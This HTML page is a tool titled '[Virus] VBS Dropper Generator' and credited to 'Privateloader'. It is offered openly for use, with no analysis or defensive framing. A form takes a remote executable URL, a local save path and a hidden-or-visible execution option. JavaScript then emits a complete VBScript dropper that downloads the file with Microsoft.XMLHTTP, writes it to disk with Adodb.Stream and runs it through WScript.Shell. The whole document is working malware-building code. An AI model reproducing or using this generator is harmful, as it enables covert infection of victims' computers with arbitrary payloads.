<html>
<title>[Virus] VBS Dropper Generator</title>
<body bgColor=#5e717f><br>
<table style="background: #bed5e2;" cellspacing=0 cellpadding=0 align=center>
<tr>
<td style="border-right: #d8d8d8 0.75pt solid; padding-right: 6pt; border-top: #d8d8d8 0.75pt solid; padding-left: 6pt; background: #567280; padding-bottom: 6pt; border-left: #d8d8d8 0.75pt solid; width: 317.5pt; padding-top: 6pt;">
<p><b><span style="font-size: 10pt; color: #ff9900; font-family: verdana; mso-ansi-language: en">[Virus] VBS Dropper Generator</span></b></p>
</td>
</tr>
<tr>
<td style="padding-right: 6pt; padding-left: 6pt; padding-bottom: 6pt; padding-top: 6pt"><br>
<center><table border=0 cellspacing=0 cellpadding=0><tr><td>
<p style="margin:0cm;margin-bottom:.0001pt;line-height:115%">
<span style="font-size:9.0pt;font-family:verdana;">VBS Dropper Generator</p>
</td></tr></table><br>
<table>
<tr><td> Server File : </td><td><input type="text" id="serverfile" value="http://127.0.0.1/file.exe"></td></tr>
<tr><td> Local File : </td><td><input type="text" id="localfile" value="C:\Windows\temp\file.exe"></td></tr>
<tr><td> Settings : </td><td><select id="settings" style="width: 100%"><option value="0">Execute Hidden</option><option value="1" selected>Execute Visible</option></select></td></tr>
<tr><td></td><td><input type="submit" value="Generate" onclick="generate();" style="width: 100%"></td></tr>
</table>
<br><br>
<script>
function generate()
{
var serverfile = document.getElementById("serverfile").value;
var localfile = document.getElementById("localfile").value;
var settings = document.getElementById("settings").value;
if (serverfile == "") {alert('Type the server file location!'); return false;}
if (localfile == "") {alert('Type the local file location!'); return false;}
document.write('<html><title>[Virus] VBS Dropper Generator</title><body bgColor=#5e717f><br><table style="background: #bed5e2;" cellspacing=0 cellpadding=0 align=center><tr><td style="border-right: #d8d8d8 0.75pt solid; padding-right: 6pt; border-top: #d8d8d8 0.75pt solid; padding-left: 6pt; background: #567280; padding-bottom: 6pt; border-left: #d8d8d8 0.75pt solid; width: 317.5pt; padding-top: 6pt;"><p><b><span style="font-size: 10pt; color: #ff9900; font-family: verdana; mso-ansi-language: en">[Virus] VBS Dropper Generator</span></b></p></td></tr><tr><td style="padding-right: 6pt; padding-left: 6pt; padding-bottom: 6pt; padding-top: 6pt"><br><center><p style="margin:0cm;margin-bottom:.0001pt;line-height:115%"><span style="font-size:9.0pt;font-family:verdana;">Save the code as .VBS file.</p><br><table border=0 cellspacing=0 cellpadding=0><tr><td><p style="margin:0cm;margin-bottom:.0001pt;line-height:115%"><span style="font-size:9.0pt;font-family:verdana;"><center><textarea rows=15 cols=50 style="resize: none;">dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")\n dim bStrm: Set bStrm = createobject("Adodb.Stream")\n xHttp.Open "GET", "'+serverfile+'", False\n xHttp.Send\n with bStrm\n     .type = 1 &#39;\n     .open\n     .write xHttp.responseBody\n    .savetofile "'+localfile+'", 2 &#39;\n end with\n Set objShell = WScript.CreateObject("WScript.Shell")\n objShell.Run("'+localfile+'"), '+settings+', True</textarea></center><br><br><table style="background: #bed5e2; width: 317.5pt; border-collapse: collapse; mso-padding-alt: 6.0pt 6.0pt 6.0pt 6.0pt" cellspacing=0 cellpadding=0 width=690 align=center bgColor=#bed5e2 border=0><tr><td style="border-right: #d8d8d8 0.75pt solid; padding-right: 6pt; border-top: #d8d8d8 0.75pt solid; padding-left: 6pt; background: #567280; padding-bottom: 6pt; border-left: #d8d8d8 0.75pt solid; width: 450pt; padding-top: 6pt; border-bottom: medium none"><center><p><b><span style="font-size: 10pt; color: #c2dceb; font-family: verdana; mso-ansi-language: EN">Copyright � 2019 Privateloader</span></center></b></p></td></tr></table>');
}
</script>
<table style="background: #bed5e2; width: 317.5pt; border-collapse: collapse; mso-padding-alt: 6.0pt 6.0pt 6.0pt 6.0pt" cellspacing=0 cellpadding=0 width=690 align=center bgColor=#bed5e2 border=0>
<tr><td style="border-right: #d8d8d8 0.75pt solid; padding-right: 6pt; border-top: #d8d8d8 0.75pt solid; padding-left: 6pt; background: #567280; padding-bottom: 6pt; border-left: #d8d8d8 0.75pt solid; width: 450pt; padding-top: 6pt; border-bottom: medium none">
<center><p><b><span style="font-size: 10pt; color: #c2dceb; font-family: verdana; mso-ansi-language: EN">Copyright � 2019 Privateloader</span></center></b>
</TD>
</TR>
</table>
</body>
</html>